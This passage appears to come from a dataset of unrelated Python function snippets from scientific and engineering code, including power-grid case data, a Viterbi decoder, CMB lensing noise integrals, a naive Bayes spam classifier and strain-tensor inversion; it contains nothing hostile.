1, 1.1, 0.9, 0,0, 0, 0],\r\n [5, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [6, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [7, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [8, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [9, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [10, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [11, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [12, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [13, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [14, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [15, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [16, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0]\r\n ])\r\n\r\n ## generator data\r\n # bus, Pg, Qg, Qmax, Qmin, Vg, mBase, status, Pmax, Pmin, Pc1, Pc2,\r\n # Qc1min, Qc1max, Qc2min, Qc2max, ramp_agc, ramp_10, ramp_30, ramp_q, apf\r\n ppc[\"gen\"] = array([\r\n [1,\t0,\t0,\t10,\t-10,\t1.0224,\t100,\t1,\t10,\t-10,\t0,\t0,\t0,\t0,\t0,\t0,\t0,\t0,\t0,\t0, 0, 0,0, 0, 0],\r\n [3 ,0, 0, 50e-3, -50e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0],\r\n [5 , 0, 0, 10e-3, -10e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0],\r\n [10 , 0, 0, 10e-3, -10e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0],\r\n [13 ,0, 0, 10e-3, -10e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0],\r\n [15 , 0, 0, 50e-3, -50e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0]\r\n ])\r\n load_b = array([2, 4, 9, 12, 14])\r\n ppc[\"bus\"][load_b, 2] = multiply(array([-2.1125, -0.2231, -0.1664, -0.0719, -1.4633]).T, 0.03)\r\n ppc[\"bus\"][load_b, 3] = multiply(array([1.6492, 0.4054, 0.8599, 0.8845, 0.6778]).T, 0.03)\r\n ## branch data\r\n # fbus, tbus, r, x, b, rateA, rateB, rateC, ratio, angle, status, angmin, angmax\r\n ppc[\"branch\"] = array([\r\n [1, 2, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [1, 8, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [1, 15, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [2, 3, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [2, 6, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [2, 7, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [3, 4, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [4, 5, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [8, 9, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [8, 12, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [8, 13, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [9, 10, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [9, 14, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [10, 11, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [15, 16, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0]\r\n ])\r\n R1 = 0.43\r\n L1 = 0.4e-3\r\n RS1 = 0.32\r\n LS1 = 0.39e-3\r\n Zbase = (0.4*0.4/100)\r\n branch_phase =array([\r\n [1, 1, 2, 188, R1, L1],\r\n [2, 1 ,8, 346, R1, L1],\r\n [3 ,1 ,15,501, R1 ,L1],\r\n [4, 2, 3, 130, RS1,LS1],\r\n [5, 2, 6, 145, RS1,LS1],\r\n [6, 2 ,7, 157, RS1,LS1],\r\n [7, 3, 4, 185, RS1,LS1],\r\n [8, 4, 5, 1000,RS1,LS1],\r\n [9, 8 ,9, 416, RS1,LS1],\r\n [10,8 ,12,130, RS1,LS1],\r\n [11,8 ,13,121, RS1,LS1],\r\n [12,9 ,10,130, RS1,LS1],\r\n [13,9 ,14,127, RS1,LS1],\r\n [14,10,11,251, RS1,LS1],\r\n [15,15,16,345, RS1,LS1]\r\n ])\r\n ppc[\"branch\"][:, [2,3]] = multiply(array([branch_phase[:, 4]*branch_phase[:, 3], branch_phase[:, 4]*branch_phase[:, 4]*100*pi]).T,0.001/Zbase)\r\n\r\n ##----- OPF Data -----##\r\n ## area data\r\n # area refbus\r\n\r\n\r\n ## generator cost data\r\n # 1 startup shutdown n x1 y1 ... xn yn\r\n # 2 startup shutdown n c(n-1) ... c0\r\n\r\n\r\n return ppc", "def condition_tpm(self,tpm, fixed_nodes, state):\n conditioning_indices = [[slice(None)]] * len(state)\n for i in fixed_nodes:\n # Preserve singleton dimensions with `np.newaxis`\n conditioning_indices[i] = [state[i], np.newaxis]\n # Flatten the indices.\n conditioning_indices = list(chain.from_iterable(conditioning_indices))\n # Obtain the actual conditioned TPM by indexing with the conditioning\n # indices.\n return tpm[tuple(conditioning_indices)]", "def test_active_inference_SPM_1b(self):", "def TR_algo2(p, vd=2):\n # h will contain the Hilbert index\n h = 0\n # ve and vd contain the entry point and dimension of the current subcube\n # we choose here a main traversal direction N-2 (i.e. z for a cube) to match\n # the illustrations\n ve = 0\n for i in range(M-1, -1, -1):\n # the cell label is constructed in two steps\n # 1. extract the relevant bits from p\n l = [bit_component(px, i) for px in p]\n # 2. construct a integer whose bits are given by l\n l = sum( [lx*2**j for j, lx in enumerate(l)] )\n # transform l into the current subcube\n l = T(ve, vd, l)\n # obtain the gray code ordering from the label l\n w = inverse_gc(l)\n # compose (see [TR] lemma 2.13) the transform of ve and vd\n # with the data of the subcube\n ve = ve ^ (rotate_left(e(w), vd+1))\n vd = (vd + d(w) + 1) % N\n # move the index to more significant bits and add current value\n h = (h << N) | w\n return h", "def viterbi(self):\n # initialisation\n self.phi = zeros((self.noOfEmmittingStates+2, self.T + 1))\n self.phi[0,0] = 1.0\n for i in range(1,self.noOfEmmittingStates+2):\n self.phi[i,0] = 0.0\n for t in range(1,self.T+1):\n self.phi[0,t] = 0.0\n self.traceback = zeros((self.noOfEmmittingStates+1, self.T+1))\n\n # main recursion\n for t in range(1, self.T + 1):\n for j in range(1, self.noOfEmmittingStates + 1):\n phiTemp = zeros((self.noOfEmmittingStates + 1, 1))\n for k in range(self.noOfEmmittingStates+1):\n phiTemp[k,0] = self.phi[k,t-1] * self.transitionMatrix[k, j-1]\n self.traceback[j-1,t-1] = nonzero(phiTemp == phiTemp.max(0))[0][0]\n self.phi[j, t] = phiTemp.max(0) * self.b[j-1, t-1]\n\n # last column - set states which can't reach term to 0, sub for term\n for j in range(1,self.noOfEmmittingStates + 1):\n if self.transitionMatrix[j,-1] == 0:\n self.phi[j,-1] = 0\n phiTemp = zeros((self.noOfEmmittingStates+1, 1))\n for k in range(self.noOfEmmittingStates + 1):\n phiTemp[k,0] = self.phi[k,-1] * self.transitionMatrix[k,-1]\n self.traceback[-1,-1] = nonzero(phiTemp == phiTemp.max(0))[0][0]\n self.phi[-1,-1] = phiTemp.max(0)", "def N_TE_EB(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_EB(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEB(l2)\n result += 0. #self.F_EB(l2, l1, -phi)*self.CMB.ftotalTB(l1)*self.CMB.ftotalEE(l2)\n result *= self.F_TE(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TE_EB.__func__, \"integ\"):\n self.N_TE_EB.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TE_EB.integ(integrand, nitn=8, neval=1000)\n result = self.N_TE_EB.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def getEG(n,int_method,func) :\n m = np.asarray([0.5,0.6,0.7,0.8,0.9,1,1.1,1.2,1.3,1.4,1.5,2,2.5,3,3.5,4,\n 4.5,5,5.5,6,6.5,7,7.5,8,8.5,9,9.5,10])\n bes = np.asarray([0.5,0.47768,0.44879,0.39831,0.25858,0,0.15502,0.25699,\n 0.30896,0.35245,0.39119,0.51822,0.53678,0.54984,0.55847,\n 0.56395,0.57054,0.57950,0.58402,0.58765,0.59512,0.60214,\n 0.60469,0.61143,0.61789,0.62443,0.63097,0.63694])\n p = np.asarray([1,0.85417,0.94685,1.04467,2.55052,0,1.59086,\n 1.00670,0.88866,0.83763,0.81030,0.76108,0.83093,0.86863,\n 0.89233,0.90909,0.92097,0.93007,0.93735,0.94332,0.94813,\n 0.95193,0.95557,0.95864,0.96107,0.96360,0.96570,\n 0.96788])\n h0 = np.asarray([0,-0.03567,-0.04808,-0.04315,-0.01879,0,0.00041,0.00069,\n 0.00639,0.01405,0.02294,0.07814,0.13994,0.19278,0.23793,\n 0.27678,0.31039,0.33974,0.36585,0.38917,0.41003,0.42891,\n 0.44621,0.46195,0.47644,0.48982,0.50223,0.51379])\n h1 = np.asarray([0,0.26899, 0.10571,0.01763,-0.39382,0,0.15211,0.05665,\n 0.00933,-0.02791,-0.05876,-0.16720,-0.13033,-0.10455 ,\n -0.08618,-0.07208,-0.06179,-0.05369,-0.04715,-0.04176,\n -0.03742,-0.03408,-0.03081,-0.02808,-0.02599,-0.02375,\n -0.02194,-0.02004])\n h2 = np.asarray([0,-0.09016,-0.06893,-0.04971,-0.08828,0,-0.03341,\n -0.03964,-0.04456,-0.04775,-0.04984,-0.05381,-0.03570,\n -0.02476,-0.01789,-0.01333,-0.01028,-0.00812,-0.00653,\n -0.00534,-0.00444,-0.00376,-0.00319,-0.00274,-0.00238,\n -0.00207,-0.00182,-0.00160])\n h3 = np.asarray([0,0.03993,0.03363,0.02216,-0.00797,0,0.00899,0.01172,\n 0.01150,0.01026,0.00860,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,\n 0])\n \n if (func == True) :\n int_bes = splev(n,splrep(m, bes))\n int_p = splev(n,splrep(m, p))\n int_h0 = splev(n,splrep(m, h0))\n int_h1 = splev(n,splrep(m, h1))\n int_h2 = splev(n,splrep(m, h2))\n int_h3 = splev(n,splrep(m, h3))\n else :\n int_bes = griddata(m, bes, n, method=int_method)\n int_p = griddata(m, p, n, method=int_method)\n int_h0 = griddata(m, h0, n, method=int_method)\n int_h1 = griddata(m, h1, n, method=int_method)\n int_h2 = griddata(m, h2, n, method=int_method)\n int_h3 = griddata(m, h3, n, method=int_method)\n \n return np.asarray([int_bes,int_p,int_h0,int_h1,int_h2,int_h3])", "def test_generate_nb(self):\n pass", "def Create(self, tokens):\n self.delay1 = int(tokens[DELAY1])\n self.delay2 = int(tokens[DELAY2])\n self.block = int(tokens[BLOCK])\n self.trial = int(tokens[TRIAL])\n self.practiced = tokens[PRACTICED]\n self.fixationOnset = int(tokens[FIXATION_ONSET])\n self.encodingOnset = int(tokens[ENCODING_ONSET])\n self.encodingRt = int(tokens[ENCODING_RT])\n self.executionOnset = int(tokens[EXECUTION_ONSET])\n self.executionRt = int(tokens[EXECUTION_RT])\n self.probeOnset = int(tokens[PROBE_ONSET])\n self.probeRt = int(tokens[PROBE_RT])\n self.probeAcc = int(tokens[PROBE_ACC])\n self.acc = int(tokens[PROBE_ACC])\n self.blockBegin = 0\n self.blockOffset = 0\n\n # In case of RTs that are 0s, one needs to apply\n # a correction. In particular, one needs to estimate\n # the correct duration of each phase.\n if self.encodingRt == 0:\n d = self.executionOnset - self.encodingOnset - self.delay1 - 2000\n #print \"Trial %d, EncodingRT=0, estimated as %d\" % (self.trial, d) \n self.encodingRt = d\n\n if self.executionRt == 0:\n d = self.probeOnset - self.executionOnset - self.delay2 - 1000\n #print \"Trial %d, ExecutionRT=0, estimated as %d, probe=%d, exec=%d, delay2=%d\" % (self.trial, d, self.probeOnset, self.executionOnset, self.delay2) \n self.executionRt = d\n\n # If, after the correction, we have negative RTs, that means\n # that we are dealing with aborted trials (in the newer version \n # of the Eprime script). They need to be removed.\n \n if self.executionRt <= 0 or self.encodingRt <= 0:\n print \"*** Excluding trial %d --- out of time ***\" % self.trial\n # The current probe RT belongs to the previous trial, so it must\n # be overwritten.\n self.executionRt = -1 # Override (in case only Encoding was detected)\n self.probeRt = -1 # Override\n self.probeAcc = 0\n self.acc = 0\n\n self.onsets = {'Encoding' : self.encodingOnset,\n 'Execution' : self.executionOnset,\n 'Probe' : self.probeOnset}\n\n self.rts = {'Encoding' : self.encodingRt,\n 'Execution' : self.executionRt,\n 'Probe' : self.probeRt}", "def ind_sim(n,CV,BV,N,p,d): \n dic={}\n dic2={}\n for i in range(N):\n Bt=random.choices('HL', weights=(p,1-p), k=n)\n pb=[round((1-p), 5) if x=='L' else p for x in Bt] \n Ct=random.choices('HL', weights=(p,1-p), k=n)\n pc=[round((1-p), 5) if x=='L' else p for x in Ct] \n [npvt,pr]=NPV(Bt,Ct,BV,CV,d,np.prod(pb),np.prod(pc))\n if npvt in dic.keys():\n dic[npvt] += 1\n else:\n dic[npvt] = 1\n dic2[npvt] =pr\n return (dic, dic2)", "def testingPhase(SP, HP):\n classification= {}\n TP, TN, FP, FN = 0,0,0,0\n\n pullData = open(\"labels\", \"r\").read()\n dataArray= pullData.split('\\n')\n dataArrayTest=dataArray[21301:-1] #opens files from folder 070 onwards \n \n for eachLine in dataArrayTest:\n kind,file = eachLine.split(' ')\n print(file,kind)\n if (kind == \"spam\"):\n SO = 1 #initially stating that it is a spam not a ham\n HO = 0\n elif (kind== \"ham\"):\n HO = 1\n SO = 0\n file=file.strip('../') \n fileDir = os.path.dirname(os.path.realpath('__file__'))\n filepath = os.path.join(fileDir,file) \n email=\"\"\n fh = open(filepath, encoding=\"ascii\", errors=\"ignore\")\n for line in fh:\n email += line\n fh.close()\n email= email.lower()\n email_words = processText(contentEmail(email))\n email_words = tuple(email_words)\n spam_ba= math.log(PS,10) #initially contains value of Spam Probability\n ham_ba= math.log(PH, 10) #initially contains value of Ham Probability\n\n\n \"\"\"BAYES THEOREM\"\"\"\n for word, value in SP.items(): \n if word in email_words:\n x = math.log(value, 10)\n spam_ba += x\n else:\n x = math.log(1-value, 10)\n #print(x)\n spam_ba += x \n if ham_ba > spam_ba:\n label=\"ham\"\n elif ham_ba < spam_ba:\n label=\"spam\"\n\n for word,value in HP.items(): \n if word in email_words:\n x = math.log(value, 10)\n #print(x)\n ham_ba += x \n else:\n x = math.log(1-value, 10)\n #print(x)\n ham_ba += x \n if ham_ba > spam_ba:\n label=\"ham\"\n elif ham_ba < spam_ba:\n label=\"spam\"\n\n print(\"Spam Prob: \" ,spam_ba, \"Ham Prob: \" ,ham_ba)\n\n #This part determines if the emails are ham or spam depending on the calculations\n if HO == 1 and label == \"ham\":\n TN +=1\n if HO == 1 and label == \"spam\":\n FP +=1\n if SO == 1 and label == \"spam\":\n TP +=1\n if SO == 1 and label == \"ham\":\n FN +=1\n #print(classification)\n print(TP, TN, FP, FN)\n print(spam_ba)\n print(ham_ba)\n \"\"\"COMPUTES PRECISION AND RECALL\"\"\"\n Precision = TP/(TP+FP)\n Recall = TP/(TP+FN)\n\n print(\"Precision: \", Precision, \" \", \"Recall: \", Recall)", "def MPinv(list_of_ch,direction, angle, azimuth):\n\n\n \"\"\"~~~~~~~~~~~ Input conditions ~~~~~~~~~~~~~~\"\"\"\n ch_list = list_of_ch\n direction_deg = float(direction) #inclined direction of wellbore from North\n angle_deg = float(angle) # inclined angle of well \n azimuth_deg = float(azimuth) # core orientation from North or inclined direction \n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n azimuth_deg = azimuth_deg - 45\n\n \"\"\"~~~~~~~~~~~ Allocate numbers to each direction (for example, xx => 0, xy => 3 etc...) ~~~~~~~~~~~~~~\"\"\"\n ch_col = ch_list.columns.values\n\n if \"xx\" in ch_col: ch_list.at[\"ch_no\",\"xx\"] =0\n if \"yy\" in ch_col: ch_list.at[\"ch_no\",\"yy\"] =1\n if \"zz\" in ch_col: ch_list.at[\"ch_no\",\"zz\"] =2\n if \"xy\" in ch_col: ch_list.at[\"ch_no\",\"xy\"] =3\n if \"yx\" in ch_col: ch_list.at[\"ch_no\",\"yx\"] =4\n if \"yz\" in ch_col: ch_list.at[\"ch_no\",\"yz\"] =5\n if \"zy\" in ch_col: ch_list.at[\"ch_no\",\"zy\"] =6\n if \"zx\" in ch_col: ch_list.at[\"ch_no\",\"zx\"] =7\n if \"xz\" in ch_col: ch_list.at[\"ch_no\",\"xz\"] =8\n\n ch = ch_list.loc[\"ch_no\",:].values\n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n Number_of_vector = len(ch)\n No_v = Number_of_vector\n direction_rad = direction_deg*pi*180**(-1) \n angle_rad = angle_deg*pi*180**(-1) \n azimuth_rad = azimuth_deg*pi*180**(-1) \n\n\n \"\"\"~~~~~~~~ Create matrix of Direction Cosine vectors~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n c=np.cos(0.25*pi)\n s=np.sin(0.25*pi)\n n = np.zeros((3,9))\n\n n[:,0] = np.array([1,0,0])\n n[:,1] = np.array([0,1,0])\n n[:,2] = np.array([0,0,1])\n n[:,3] = np.array([c,s,0])\n n[:,4] = np.array([c,-s,0])\n n[:,5] = np.array([0,c,s])\n n[:,6] = np.array([0,c,-s])\n n[:,7] = np.array([c,0,s])\n n[:,8] = np.array([-c,0,s])\n\n\n \"\"\"~~~~~~~~~~~~~~ coordinate transformation from 'ASR local co-ordinate' to 'Geological co-ordinate' ~~~~~~~~~~~~~~~~~\"\"\"\n cdr = np.cos(direction_rad)\n sdr = np.sin(direction_rad)\n\n caz = np.cos(azimuth_rad)\n saz = np.sin(azimuth_rad)\n\n can = np.cos(angle_rad)\n san = np.sin(angle_rad)\n\n Rdr = np.array([[cdr, sdr, 0],[-sdr, cdr, 0],[0, 0, 1]]) #counter_clockwise\n Ran = np.array([[1, 0, 0],[0, can, san],[0, -san, can]])\n Raz = np.array([[caz, -saz, 0],[saz, caz, 0],[0, 0, 1]])\n\n R1 = Ran.dot(Rdr)\n R2 = Raz.dot(R1)\n\n for i in range(0,9):\n n[:,i] = R2.dot(n[:,i])\n n= np.round(n,6)\n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n\n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n\n\n\n\n \"\"\"~~~~~~~~ Create matrix A (b = Ax: b;Observed normal strain data, x;strain tensor component which we have to determine) ~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n X = np.empty((No_v,6))\n\n for i in range(0,No_v):\n cc = ch[i]\n X[i,:] = np.array([n[0,cc]**2, n[1,cc]**2, n[2,cc]**2, 2*n[0,cc]*n[1,cc], 2*n[1,cc]*n[2,cc], 2*n[2,cc]*n[0,cc]])\n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n\n X_inv = np.linalg.pinv(X) # Calculate Moore-Penrose inverse matrix\n\n return X_inv", "async def _design_lvl_shift_internal_inv(self, pseg: int, nseg: int, out_inv_m: int,\n fanout: float,\n pinfo: Any, tbm_specs: Dict[str, Any], is_ctrl: bool,\n has_rst: bool, dual_output: bool,\n vin: str, vout: str) -> Tuple[int, int]:\n if is_ctrl: # size with fanout\n inv_nseg = int(np.round(nseg / fanout))\n inv_nseg = 1 if inv_nseg == 0 else inv_nseg\n inv_pseg = int(np.round(pseg / fanout))\n inv_pseg = 1 if inv_pseg == 0 else inv_pseg\n self.log(f\"Calculated inv to need nseg : {inv_nseg}\")\n self.log(f\"Calculated inv to need pseg : {inv_pseg}\")\n return inv_pseg, inv_nseg\n\n # First size the NMOS in the inverter assuming a reasonably sized PMOS\n inv_nseg = await self._design_lvl_shift_inv_pdn(pseg, nseg, out_inv_m, fanout, pinfo,\n tbm_specs, has_rst, dual_output, vin, vout)\n self.log(f\"Calculated inv to need at least nseg: {inv_nseg}\")\n\n # Now using the inverter pull down size, we size the inverter pull up PMOS\n inv_pseg, inv_nseg = await self._design_lvl_shift_inv_pun(pseg, nseg, inv_nseg, out_inv_m,\n fanout, pinfo,\n tbm_specs, has_rst, dual_output,\n vin, vout)\n self.log(f\"Calculated inv to need pseg: {inv_pseg} and nseg: {inv_nseg}\")\n return inv_pseg, inv_nseg", "def N_TT_TB(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_TB(l1, l2, phi)*self.CMB.ftotalTT(l1)*self.CMB.ftotalTB(l2)\n result += 0. #self.F_TB(l2, l1, -phi)*self.CMB.ftotalTB(l1)*self.CMB.ftotalTT(l2)\n result *= self.F_TT(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TT_TB.__func__, \"integ\"):\n self.N_TT_TB.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TT_TB.integ(integrand, nitn=8, neval=1000)\n result = self.N_TT_TB.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def nonhomo_system_variation_of_parameters(xc: List[Symbol], gt, t: Symbol = Symbol('t', real=True)):\n fund_matrix = eye(len(xc))\n for i, x in enumerate(xc):\n fund_matrix[:, i] = x\n\n procedure = Procedure()\n procedure.text('Fundamental matrix ').latex('\\\\Psi', nl=True)\\\n .eq(fund_matrix)\n\n gt = Matrix(gt)\n fund_inv = fund_matrix**(-1)\n procedure.text('Calculate the inverse of the fundamental matrix ').latex('\\\\Psi^{-1}', nl=True)\\\n .latex('\\\\Psi^{-1} = ').eq(fund_inv)\n\n fund_inv_gt = expand(simplify(fund_inv * gt))\n procedure.text('Compute ').latex('\\\\Psi^{-1} g(t)', nl=True)\\\n .latex('\\\\Psi^{-1} g(t) = ').eq(fund_inv_gt)\n\n procedure.text('Compute the integral', nl=True)\n fund_inv_gt_int = expand(simplify(integrate(fund_inv_gt)))\n procedure.latex('\\\\int \\\\Psi^{-1} g(t) =').eq(fund_inv_gt_int)\n\n procedure.text('Finally, ').latex(\n '\\\\vec{\\\\mathbf{x_p}} = \\\\Psi \\\\int \\\\Psi^{-1} g(t)', nl=True)\n sol = expand(fund_matrix * fund_inv_gt_int)\n procedure.latex('\\\\vec{\\\\mathbf{x_p}} =').eq(sol)\n return sol, procedure", "def binary_dec(A,n_iter = 1000):\n\n\t### Initialization ###\n\n\tp, q = np.shape(A)\n\t### B : to be changed\n\tB = np.eye(p)\n \t###\n\tC = bin_random_mat(p,q)\n\tlist_dist = []\n\tB_argmin = B\n\tC_argmin = C\n\n\n\n\n\t## temperature ##\n\tT_n = np.log(np.arange(2,n_iter+2,1))\n\t#T_n = np.arange(2,n_iter+2,1)\n\tfor i in range(n_iter):\n\t## update ##\n\t\tC_0 = np.matrix(C)\n\t\tlist_dist =np.append( list_dist, V_potential(np.dot(B,C_0),A) )\n\t\tif V_potential(np.dot(B_argmin,C_argmin),A) == 0:\n\t\t\tbreak\n\t########## transition #############\n\t# Here we take 2 steps independent(for B and for C respectively)\n\t# We could also use metropolis hasting kernel.\n\n\t\tC_iter = np.matrix(Metropolis_transition_C(C))\n\t\n\n\t\tB_iter = B[np.random.permutation(np.arange(p))]\n\t\t\n\t\tif np.random.uniform(0,1,1) < \\\n\t\t\t\tnp.exp(-1./T_n[i]*( V_potential(np.dot(B_iter,C_iter), A)\\\n\t\t\t\t - V_potential(np.dot(B,C_0),A) ) ):\n\t\t\tC = C_iter\n\t\t\tB = B_iter\n\t######### end of transition ##############\n\n\t\t\tif V_potential(np.dot(B,C),A) < np.min(list_dist):\n\t\t\t\t\n\t\t\t\tB_argmin = B\n\t\t\t\tC_argmin = np.matrix(C)\n\t\t\t# print i+1\n\t\t\t# print V_potential(np.dot(B_argmin,C_argmin),A)\n\t\t\t# print C_argmin\n\t\t\t# print '\\n'\n\n\treturn list_dist,B_argmin, C_argmin", "def N_TE_EE(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = self.F_EE(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEE(l2)\n result += self.F_EE(l2, l1, -phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEE(l2)\n result *= self.F_TE(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TE_EE.__func__, \"integ\"):\n self.N_TE_EE.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TE_EE.integ(integrand, nitn=8, neval=1000)\n result = self.N_TE_EE.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def __init__(self):\n self.modulo = Bn.from_decimal(\n \"104274339861599109435228713715012587636997755949475388588516377743858594829526246207815488124753620113654378182611410869843692693515483841382145633329409600605358434237971173658402530546783352648106247803514459454270482848535758539851532076708790494943517894654046363923325714750480680188239471613308156143136830981518627799499285672172738874571644891075726999700275877298890101149587792836886648258733566308895110719770960720300899066897289080371563621668124216187770149740826973622700315037066876583866156345639276386510201006397141393775575135928749962477326783336184434815042335057049432193006499521591281357491659\")\n self.generator = FFElement(Bn.from_decimal(\n \"81099144573950922883933823309397903831307729923277144841334749422315595743437219371821139976270089085817737914449263008752457618988770955139245864971428025146021819160336876692205993068777078938240475549226164124952577975303221660397947822711916352061614341728562734417872584743294922245761212731150483802964283263230741041446988298186702952974697967148198190463075071628059974486966250538161512056563568090071474143434146441589514816635339916481756264419884177841781745530245175458079612447970067897693825433138760936325168807521204548329680909932742314536162869895548442852131478295912996232046258690790851591666552\"),\n self.modulo, self.order())", "def nits(self):", "def define_potts_helper_functions(k):\n\n @njit\n def calc_observables(X, k=k):\n \"\"\"\n Parameters\n ----------\n X : ndarray of dtype np.int64\n Dimensions (n_samples, n_spins).\n\n Returns\n -------\n ndarray\n Dimensions (n_samples, 